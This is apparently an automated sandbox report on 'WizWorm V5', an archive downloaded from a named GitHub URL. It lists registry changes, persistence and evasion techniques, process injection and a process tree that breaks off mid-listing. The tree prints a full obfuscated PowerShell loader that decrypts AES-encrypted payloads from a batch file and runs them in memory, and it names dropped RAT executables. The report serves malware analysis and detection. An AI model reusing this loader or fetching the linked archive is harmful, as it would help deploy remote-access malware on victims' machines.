Modifies data under HKEY_USERS 12 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133691010514474515"	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WizWorm V5.rar:Zone.Identifier	chrome.exe

Runs net.exe

Runs ping.exe 1 TTPs 8 IoCs

Remote System Discovery

T1018

pid	Process
5468	PING.EXE
3512	PING.EXE
5420	PING.EXE
5988	PING.EXE
6828	PING.EXE
6192	PING.EXE
1824	PING.EXE
4984	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3164	schtasks.exe
2344	schtasks.exe
4324	schtasks.exe
6664	schtasks.exe
5912	schtasks.exe
5568	schtasks.exe
1448	schtasks.exe
5228	schtasks.exe
5648	schtasks.exe
2924	schtasks.exe
6116	schtasks.exe
5084	schtasks.exe
3920	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4532	chrome.exe
4532	chrome.exe
2100	chrome.exe
2100	chrome.exe
2100	chrome.exe
2100	chrome.exe
3640	powershell.exe
3640	powershell.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
2412	powershell.exe
2412	powershell.exe
2412	powershell.exe
4276	sihost.exe
4276	sihost.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1928	powershell.exe
1928	powershell.exe
1928	powershell.exe
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4600	WeedClient.exe
4088	powershell.exe
4088	powershell.exe
4088	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe
4440	WeedClient.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3076	7zFM.exe
3280	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4532	chrome.exe
4532	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe
Token: SeShutdownPrivilege	4532	chrome.exe
Token: SeCreatePagefilePrivilege	4532	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe
4532	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3280	Explorer.EXE
3280	Explorer.EXE
6988	Conhost.exe
6468	Conhost.exe
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 560	4532	chrome.exe	81
PID 4532 wrote to memory of 560	4532	chrome.exe	81
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 4980	4532	chrome.exe	82
PID 4532 wrote to memory of 1092	4532	chrome.exe	83
PID 4532 wrote to memory of 1092	4532	chrome.exe	83
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84
PID 4532 wrote to memory of 656	4532	chrome.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 12 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3712	attrib.exe
1296	attrib.exe
1448	attrib.exe
5688	attrib.exe
6392	attrib.exe
5244	attrib.exe
6968	attrib.exe
3520	attrib.exe
6600	attrib.exe
540	attrib.exe
6692	attrib.exe
2696	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:464

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1200

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2064

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2420

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3028

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1736

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/0xmyjozief/WizWorm-V5-xRAT/raw/main/WizWorm%20V5.rar
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd86e9cc40,0x7ffd86e9cc4c,0x7ffd86e9cc58
    3⤵
    PID:560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1608 /prefetch:2
    3⤵
    PID:4980
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2084,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2100 /prefetch:3
    3⤵
    PID:1092
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2368 /prefetch:8
    3⤵
    PID:656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3120 /prefetch:1
    3⤵
    PID:5068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3164 /prefetch:1
    3⤵
    PID:3064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4716,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4724 /prefetch:8
    3⤵
    PID:3296
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4292,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4732 /prefetch:8
    3⤵
    - NTFS ADS
    PID:4644
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4884,i,3946121445908618611,2583636620597144497,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5008 /prefetch:8
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2100
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  PID:3076
- C:\Users\Admin\Desktop\WizWorm V5\WizWorm V5.exe
  "C:\Users\Admin\Desktop\WizWorm V5\WizWorm V5.exe"
  2⤵
  - Executes dropped EXE
  PID:4844
- - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
    "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
    3⤵
    - Executes dropped EXE
    PID:2496
  - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
      "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
      4⤵
      Executes dropped EXE
      PID:1560
    - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        5⤵
        Executes dropped EXE
        
        PID:2100
      - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        6⤵
        Executes dropped EXE
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        7⤵
        Executes dropped EXE
        
        PID:2840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        7⤵
        
        PID:2736
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        
        PID:3404
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:2148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5668
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        Executes dropped EXE
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        Executes dropped EXE
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        Executes dropped EXE
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        Executes dropped EXE
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        Executes dropped EXE
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
